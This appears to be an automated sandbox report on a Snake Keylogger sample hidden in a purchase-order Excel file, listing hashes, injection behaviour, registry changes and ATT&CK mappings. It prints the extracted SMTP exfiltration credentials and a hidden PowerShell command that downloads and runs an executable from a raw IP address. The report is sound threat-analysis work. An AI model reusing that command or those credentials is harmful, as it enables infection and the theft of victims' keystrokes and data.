snakekeylogger | db66b26d04c77e03bbf22957af34ba2b5817c397036ab8d4b7c222ec1b1ff40e

General

Target

PO_723_057_35.xls
Size

342KB
MD5

f264b8c58febaa3f3eea9a8c83c78cbf
SHA1

36010881f4c3e15878bb3d5e76bc443d82827ebe
SHA256

db66b26d04c77e03bbf22957af34ba2b5817c397036ab8d4b7c222ec1b1ff40e
SHA512

a60be6e617f2704c3dfdc7bcc06e2426f5c52e56da447c92c94e1ce3d118c27b0ef180845557abf3c1d6a63de4f85b93c11eac06bb7bc51c17934406c797f912

Score

10^/10

snakekeylogger keylogger stealer

Malware Config

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
janryone.xyz
Port:
587
Username:
lux@janryone.xyz
Password:
*sQwqe$]n1[z

Signatures

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger Payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/620-103-0x0000000000400000-0x000000000046A000-memory.dmp	family_snakekeylogger
behavioral1/memory/620-104-0x000000000046476E-mapping.dmp	family_snakekeylogger
behavioral1/memory/620-107-0x0000000000400000-0x000000000046A000-memory.dmp	family_snakekeylogger

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 412 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

okMr.exeokMr.exe

pid process

1608 okMr.exe
620 okMr.exe
Loads dropped DLL 4 IoCs

Processes:

powershell.exeokMr.exe

pid process

412 powershell.exe
412 powershell.exe
412 powershell.exe
1608 okMr.exe
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

13 freegeoip.app
14 freegeoip.app
8 checkip.dyndns.org

flow	pid	process
6	412	powershell.exe

pid	process
1608	okMr.exe
620	okMr.exe

pid	process
412	powershell.exe
412	powershell.exe
412	powershell.exe
1608	okMr.exe

flow	ioc
13	freegeoip.app
14	freegeoip.app
8	checkip.dyndns.org

Drops file in System32 directory 5 IoCs

Processes:

powershell.exeOUTLOOK.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

okMr.exe

description pid process target process

PID 1608 set thread context of 620 1608 okMr.exe okMr.exe

description	pid	process	target process
PID 1608 set thread context of 620	1608	okMr.exe	okMr.exe

Drops file in Windows directory 3 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE

Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063081-0000-0000-C000-000000000046}\ = "_DistListItem"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672ED-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308D-0000-0000-C000-000000000046}\ = "_Views"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C3-0000-0000-C000-000000000046}\ = "Conflict"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063048-0000-0000-C000-000000000046}\ = "AddressLists"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063025-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630ED-0000-0000-C000-000000000046}\ = "_JournalModule"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006F025-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DA-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FA-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300C-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063020-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309E-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063099-0000-0000-C000-000000000046}\ = "_CalendarView"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F4-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303C-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063087-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C6-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300B-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063081-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EB-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063107-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303E-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D6-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DE-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630B2-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063079-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063073-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FF-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063038-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063005-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063003-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D5-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672E6-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063002-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300C-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063099-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006308A-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063087-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DC-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DF-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E3-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A2-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063026-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063037-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067352-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063007-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F1-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EA-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067366-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DD-0000-0000-C000-000000000046}\ = "_OlkCheckBox"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307F-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E9-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50BB9B50-811D-11CE-B565-00AA00608FAA}\ = "_DDocSiteControlEvents"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672EC-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

368 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeokMr.exeokMr.exe

pid process

412 powershell.exe
1608 okMr.exe
1608 okMr.exe
620 okMr.exe

pid	process
368	EXCEL.EXE

pid	process
412	powershell.exe
1608	okMr.exe
1608	okMr.exe
620	okMr.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeOUTLOOK.EXEokMr.exeokMr.exe

description	pid	process
Token: SeDebugPrivilege	412	powershell.exe
Token: SeShutdownPrivilege	1196	OUTLOOK.EXE
Token: SeDebugPrivilege	1608	okMr.exe
Token: SeDebugPrivilege	620	okMr.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

OUTLOOK.EXE

pid process

1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

OUTLOOK.EXE

pid process

1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
1196 OUTLOOK.EXE
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

EXCEL.EXEOUTLOOK.EXE

pid process

368 EXCEL.EXE
368 EXCEL.EXE
368 EXCEL.EXE
1196 OUTLOOK.EXE

pid	process
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE

pid	process
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE
1196	OUTLOOK.EXE

pid	process
368	EXCEL.EXE
368	EXCEL.EXE
368	EXCEL.EXE
1196	OUTLOOK.EXE

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

OUTLOOK.EXEpowershell.exeokMr.exe

description	pid	process	target process
PID 1196 wrote to memory of 412	1196	OUTLOOK.EXE	powershell.exe
PID 1196 wrote to memory of 412	1196	OUTLOOK.EXE	powershell.exe
PID 1196 wrote to memory of 412	1196	OUTLOOK.EXE	powershell.exe
PID 1196 wrote to memory of 412	1196	OUTLOOK.EXE	powershell.exe
PID 412 wrote to memory of 1608	412	powershell.exe	okMr.exe
PID 412 wrote to memory of 1608	412	powershell.exe	okMr.exe
PID 412 wrote to memory of 1608	412	powershell.exe	okMr.exe
PID 412 wrote to memory of 1608	412	powershell.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe
PID 1608 wrote to memory of 620	1608	okMr.exe	okMr.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO_723_057_35.xls
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:368

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w Hidden Invoke-WebRequest -Uri "http://178.17.171.144/sch/Scafu.exe" -OutFile "C:\Users\Public\Documents\okMr.exe";C:\Users\Public\Documents\okMr.exe
2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:412

C:\Users\Public\Documents\okMr.exe
"C:\Users\Public\Documents\okMr.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1608

C:\Users\Admin\AppData\Local\Temp\okMr.exe
C:\Users\Admin\AppData\Local\Temp\okMr.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
C:\Users\Admin\AppData\Local\Temp\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
C:\Users\Public\Documents\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
C:\Users\Public\Documents\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
\Users\Admin\AppData\Local\Temp\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
\Users\Public\Documents\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
\Users\Public\Documents\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
\Users\Public\Documents\okMr.exe
MD5
c6f26315e927bf5c6764a5b8740ab06f

SHA1
3bbf84238fe0e42d06be6f6abd9296a61fee6832

SHA256
1dd94a5613c355e764ae8a58e35064355a8803e55fb5b7e386bb4b19286e7f07

SHA512
b5619737e26584244e281f66a79e5b4480d6bb9f40984357cd10692b29618eb3969b4073a8ac3d2e76a52965adebb0b9b15bf6c57af3bde49f990e5e25bd7e69

Download Submit
memory/368-60-0x0000000071671000-0x0000000071673000-memory.dmp

Filesize
8KB

Download
memory/368-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/368-110-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/368-59-0x000000002F841000-0x000000002F844000-memory.dmp

Filesize
12KB

Download
memory/412-69-0x0000000004750000-0x0000000004751000-memory.dmp

Filesize
4KB

Download
memory/412-67-0x0000000004790000-0x0000000004791000-memory.dmp

Filesize
4KB

Download
memory/412-87-0x00000000064E0000-0x00000000064E1000-memory.dmp

Filesize
4KB

Download
memory/412-88-0x000000007EF20000-0x000000007EF21000-memory.dmp

Filesize
4KB

Download
memory/412-89-0x0000000006510000-0x0000000006511000-memory.dmp

Filesize
4KB

Download
memory/412-79-0x00000000062B0000-0x00000000062B1000-memory.dmp

Filesize
4KB

Download
memory/412-74-0x0000000005810000-0x0000000005811000-memory.dmp

Filesize
4KB

Download
memory/412-64-0x0000000000000000-mapping.dmp

Download
memory/412-71-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/412-70-0x0000000004752000-0x0000000004753000-memory.dmp

Filesize
4KB

Download
memory/412-68-0x00000000025D0000-0x00000000025D1000-memory.dmp

Filesize
4KB

Download
memory/412-65-0x0000000076661000-0x0000000076663000-memory.dmp

Filesize
8KB

Download
memory/412-66-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/412-80-0x0000000006440000-0x0000000006441000-memory.dmp

Filesize
4KB

Download
memory/620-103-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/620-104-0x000000000046476E-mapping.dmp

Download
memory/620-107-0x0000000000400000-0x000000000046A000-memory.dmp

Filesize
424KB

Download
memory/620-109-0x0000000004710000-0x0000000004711000-memory.dmp

Filesize
4KB

Download
memory/1608-100-0x0000000004AB5000-0x0000000004AC6000-memory.dmp

Filesize
68KB

Download
memory/1608-101-0x0000000000BA0000-0x0000000000BDD000-memory.dmp

Filesize
244KB

Download
memory/1608-99-0x00000000005F0000-0x00000000005F2000-memory.dmp

Filesize
8KB

Download
memory/1608-98-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

Filesize
4KB

Download
memory/1608-96-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/1608-92-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads